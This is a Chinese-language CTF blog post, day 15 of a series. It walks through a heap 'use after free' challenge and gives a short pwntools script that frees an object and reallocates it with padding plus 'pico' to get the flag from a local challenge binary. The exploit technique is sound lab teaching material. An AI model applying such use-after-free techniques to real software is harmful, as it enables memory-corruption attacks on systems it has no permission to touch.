iT邦幫忙

2024 iThome 鐵人賽
DAY 15
0
佛心分享-刷題不只是刷題

CTF 刷題系列 第 15

CTF Day 15 Binary (heap 3)

16th鐵人賽
49 瀏覽

  • 分享至 

  • xImage
    •  

題目 heap3

https://ithelp.ithome.com.tw/upload/images/20240929/20155574Gj7uc6Qken.png

首先,他們有 create struct
https://ithelp.ithome.com.tw/upload/images/20240929/20155574XHqswixgb1.png

然後看到 init() 的地方
一開始的時候會依照你 object 的大小,劃分出一塊空間給你
並在char flag 輸入 bico
https://ithelp.ithome.com.tw/upload/images/20240929/20155574v9K8z3Azfu.png

free_memory() 負責將上面劃分的空間”釋放”掉
https://ithelp.ithome.com.tw/upload/images/20240929/20155574lsnJwlinKH.png

而有一個 alloc_object 可以讓我們先輸入想要劃分的大小
再填入想要的 Data
https://ithelp.ithome.com.tw/upload/images/20240929/20155574alBIai8qc4.png

題目有提示 : use after free

  1. 所以意思是 先 init() 好
  2. 然後將 x free 掉
  3. 再輸入自己想要的 data 到 malloc 裡就會拿到 flag了

Script

from pwn import *

r = process("./chall")

r.sendline(b"5")
r.sendline(b"2")
r.recvuntil(b"Size of object allocation:")
r.sendline(b"35")
r.recvuntil(b"Data for flag:")
r.sendline(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico")
r.recvuntil(b"Enter your choice:")
r.sendline(b"4")

print(r.recvall())

https://ithelp.ithome.com.tw/upload/images/20240929/20155574iB9n7S9Kr0.png


上一篇
CTF Day 14 Binary (heap 2)
下一篇
CTF Day 16 Binary(buffer overflow 0)
系列文
CTF 刷題19
  1. 15
    CTF Day 15 Binary (heap 3)
  2. 16
    CTF Day 16 Binary(buffer overflow 0)
  3. 17
    CTF Day 17 Binary(buffer overflow 1)
  4. 18
    CTF Day 18 Binary(buffer overflow 2)
  5. 19
    CTF Day 19 Binary(clutter-overflow)
完整目錄
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
參賽組數
1049
團體組數
40
累計文章數
16802
最後報名日
9/15
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 16th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react 資訊安全
熱門問題
熱門回答
熱門文章
IT邦幫忙